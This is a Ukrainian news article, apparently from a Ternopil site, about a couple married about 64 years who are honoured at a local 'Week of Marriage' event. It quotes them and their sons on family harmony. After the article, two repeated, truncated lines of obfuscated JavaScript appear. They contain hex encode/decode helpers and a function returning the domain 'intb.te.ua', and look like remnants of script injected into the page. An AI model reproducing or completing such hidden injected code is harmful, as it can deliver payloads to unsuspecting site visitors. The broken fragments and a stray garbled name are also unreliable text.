Ви знаходитесь: Головна / Новини / Подружжя Олексів більше півстоліття разом

Подружжя Олексів більше півстоліття разом

Останній день «Тижня подружжя» в Тернополі відзначили низкою заходів, серед яких – парад красивих та щасливих сімей. «Золоте весілля» у них ще попереду. Однак, організатори заходу вирішили знайти пару, яка встигла відзначити не лише «золоте», а вже й «діамантове» весілля. Майже 65 років вони прожили разом. Це рекорд, можливо, не лише обласного масштабу.

ІВАН МУДРИЙ, співорганізатор «Тижня подружжя» в Тернополі

«Підозрюю, що це по Україні найстарше подружжя – 64 роки. Коли я побачив, я стояв приблизно тут, я побачив, як вони йдуть. Я був вражений їхньою молодістю. Тому, що дійсно на 90 років вони не виглядають, вони виглядають на років 70».

Отож знайомтеся, Іван Олекса та його дружина – Марія, із села Настасів. Своє кохання, єдине на все життя, знайшли після важких років Другої Світової та примусового переселення.

ІВАН ОЛЕКСА

«Одружилися. І хати нема, і там, де я жив – нема приміщення, і там, де вона також – ні. Треба хату якусь будувати або купити. Але нема за що купити. І не годен заробити, щоб були гроші, щоб купити. Але помаленьку, помаленьку, з часом, ми купили таку стареньку хатину, потім відремонтували».

Кажуть, за роки пережили разом чимало, було, що і не мали шматка хліба. Однак, зізнаються, робили все завжди разом, в тому числі і сварилися разом.

ІВАН ОЛЕКСА

«Деколи говоримо тако файно, як зараз ми говоримо. А деколи і трохи голосніше. Трохи з криком».

Пан Іван додає, найчастіше в сварках поступається він. Адже, жартує, може бути біда. А дружина посміхається і ніжно його цілує. Обоє зізнаються, один без одного були лише два тижні, коли чоловік їздив за кордон. Секрет свого щастя не приховують.

МАРІЯ ОЛЕКСА

«Треба, щоб жінки чоловіків шанували, любили. І самі добре жили в родині, шанувалися. То велике є для вас, ви ще молоденькі, але вам треба то знати вже».

ІВАН ОЛЕКСА

«Труднощі і радощі бувають всюди, в кожній родині. А основне – згода. Щоб порадитися, розуміти один одного, тоді добре і весело живеться».

Так виховували і своїх дітей – трьох синів та доньку, а також дев’ятьох внуків, а тепер і чотирьох правнуків. Діти розповідають, зазвичай сварок батьків бачити не доводилося.

МИХАЙЛО, син подружжя Олексів

«В них завжди був один погляд на якесь питання, були погляди різні, але вони приходили до тої самої думки. Особливо, по відношенню до дітей. Якщо тато сказав, щось зробити, а мама була проти цього, то вона в даний момент тримала лінію тата. Щоб діти знали, що батьки одної думки по цьому питанню».

порМИРОСЛАВ, син подружжя Олексів

«От тато головний, він сказав і мама дотримувалася, а як би інакше було?»

Хоч вже пройшло багато років, а подружжя Олексів, як і колись з ніжністю дивляться один на одного та посміхаються, як молодята. Організатори «Тижня подружжя» під кінець зустрічі подарували їм дуже символічний подарунок. Годинник з цитатою з Біблії «Любов не перестає…». Адже хто, як не вони є чудовою ілюстрацією до цих слів.

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t=””,o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return “intb.te.ua”},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf(“http”)==0){return p}for(var e=0;e

Автор: Оксана Максимлюк

Оксана Максимлюк

Залишити коментар

Ваша електронну адресу не буде опубліковано. Обов’язкові для заповнення поля позначені *

*

Scroll To Top